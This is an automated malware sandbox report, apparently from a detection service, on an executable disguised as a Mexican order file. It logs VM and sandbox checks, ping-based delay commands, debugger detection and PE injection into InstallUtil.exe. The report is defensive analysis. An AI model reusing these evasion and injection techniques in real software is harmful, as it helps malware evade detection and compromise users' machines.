                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    barindex
                    Yara detected AntiVM3
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.3a00802.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.Orden#46789_2024_Optoflux_mexico_sderls.exe.39bca32.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2983258832.0000000003969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Orden#46789_2024_Optoflux_mexico_sderls.exe PID: 6524, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: vexplorerez.exe PID: 4000, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: vexplorerez.exe PID: 7124, type: MEMORYSTR
                    Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exe, 00000000.00000002.2983258832.0000000003B60000.00000004.00000800.00020000.00000000.sdmp, Orden#46789_2024_Optoflux_mexico_sderls.exe, 00000000.00000002.2983258832.0000000003969000.00000004.00000800.00020000.00000000.sdmp, Orden#46789_2024_Optoflux_mexico_sderls.exe, 00000000.00000002.2983258832.0000000003C43000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000010.00000002.3865481800.0000000004734000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000010.00000002.3865481800.0000000004371000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000010.00000002.3865481800.0000000004652000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000011.00000002.4064362259.0000000003D22000.00000004.00000800.00020000.00000000.sdmp, vexplorerez.exe, 00000011.00000002.4064362259.0000000003E04000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000018.00000002.3511312688.00000000007C2000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
                    Uses ping.exe to sleep
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 16
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 18
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 18
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 16Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 18Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 18Jump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeMemory allocated: BF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeMemory allocated: 2880000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeMemory allocated: 2690000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory allocated: 1840000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory allocated: 3370000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory allocated: 31C0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory allocated: 8DB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory allocated: 9DB0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory allocated: 9F90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory allocated: AF90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory allocated: B370000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory allocated: C370000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory allocated: D370000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory allocated: CF0000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory allocated: 2A40000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory allocated: D30000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory allocated: 8280000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory allocated: 9280000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory allocated: 9460000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory allocated: A460000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory allocated: A830000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory allocated: B830000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory allocated: C830000 memory reserve | memory write watchJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: BA0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2920000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 2690000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeWindow / User API: threadDelayed 7415Jump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeWindow / User API: threadDelayed 1347Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeWindow / User API: threadDelayed 1830Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeWindow / User API: threadDelayed 515Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeWindow / User API: threadDelayed 2121Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeWindow / User API: threadDelayed 5105Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 1873
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 7978
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exe TID: 6888Thread sleep time: -27670116110564310s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exe TID: 3052Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exe TID: 2448Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exe TID: 3248Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exe TID: 7340Thread sleep time: -60000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exe TID: 7092Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exe TID: 6316Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exe TID: 7484Thread sleep time: -22136092888451448s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exe TID: 7928Thread sleep time: -61000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exe TID: 3132Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exe TID: 6240Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep count: 38 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -35048813740048126s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -200000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3788Thread sleep count: 1873 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -99890s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3788Thread sleep count: 7978 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -99778s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -99656s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -99547s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -99437s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -99328s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -198438s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -99109s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -98996s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -98875s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -98765s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -98656s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -98546s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -98437s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -98328s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -98219s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -98109s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -98000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -97890s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -97781s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -97672s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -97562s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -97453s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -97343s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -97234s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -97125s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -97015s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -96906s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -96797s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -96686s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -96562s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -96453s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -96312s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -96203s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -96093s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -99891s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -99766s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -99326s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -99094s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -98969s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -98859s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -98750s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -98641s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 3384Thread sleep time: -98531s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
                    Source: C:\Windows\SysWOW64\PING.EXELast function: Thread delayed
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99890
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99778
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99547
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99437
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99109
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98996
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98875
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98765
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98656
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98546
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98437
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98328
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98219
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98109
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97890
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97781
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97672
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97562
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97343
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97234
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97125
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 97015
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96906
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96797
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96686
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96562
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96453
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96312
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96203
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 96093
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99891
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99766
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99326
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 99094
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98969
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98859
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98750
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98641
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 98531
                    Source: InstallUtil.exe, 0000001A.00000002.4607747615.0000000002951000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware
                    Source: vexplorerez.exe, 00000011.00000002.4075531661.0000000007850000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}~PWQ
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exe, 00000000.00000002.2979580611.0000000000B10000.00000004.08000000.00040000.00000000.sdmp, Orden#46789_2024_Optoflux_mexico_sderls.exe, 00000000.00000002.2983258832.0000000003969000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VBoxTray
                    Source: InstallUtil.exe, 0000001A.00000002.4607747615.0000000002951000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exe, 00000000.00000002.2983258832.0000000003969000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: sandboxierpcssGSOFTWARE\VMware, Inc.\VMware VGAuth
                    Source: vexplorerez.exe, 00000011.00000002.4034654888.0000000000ABB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"sys
                    Source: InstallUtil.exe, 0000001A.00000002.4617818400.0000000005B70000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
                    Source: InstallUtil.exe, 00000018.00000002.3511312688.00000000007C2000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: VMwareVBox
                    Source: Orden#46789_2024_Optoflux_mexico_sderls.exe, 00000000.00000002.2979921643.0000000000C43000.00000004.00000020.00020000.00000000.sdmp, vexplorerez.exe, 00000010.00000002.3846687314.0000000001633000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_00BA70B0 CheckRemoteDebuggerPresent,26_2_00BA70B0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess queried: DebugPort
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 26_2_00BABB06 LdrInitializeThunk,26_2_00BABB06
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Orden#46789_2024_Optoflux_mexico_sderls.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Allocates memory in foreign processes
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7C0000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 340000 protect: page execute and read and writeJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and writeJump to behavior
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7C0000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 340000 value starts with: 4D5AJump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5AJump to behavior
                    Writes to foreign memory regions
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7C0000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 7C2000Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\vexplorerez.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 800000Jump to behavior
